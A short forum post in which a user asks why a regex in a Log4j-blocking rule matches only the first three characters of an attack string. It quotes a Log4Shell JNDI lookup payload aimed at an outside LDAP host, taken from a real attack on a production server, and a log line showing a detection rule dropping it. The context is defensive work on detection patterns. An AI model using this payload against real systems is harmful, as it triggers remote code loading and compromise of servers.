Forum Discussion
CarloMun
Dec 19, 2021Nimbostratus
Hi @Daniel Wolf ,
thank you for your quick reply. Well, I already actually tried to get my answer via regex101.com.
Here what somehow suprises me:
if I type in this string
/${jndi:ldap:/55.55.55.55:1389/Exploit}
which I extracted from a real attack / exploit attempt against one of our production servers:
info tmm[13241]: Rule /Linux/LOG4J-iRULE-BLOCK <HTTP_REQUEST>: log4j_rce_detection drop on URI: /${jndi:ldap:/55.55.55.55:1389/Exploit}
I only get match on the first 3 characters:
Is it meant to be so ? or am I missing something here ?
Thank you for clarifying.
Best Regards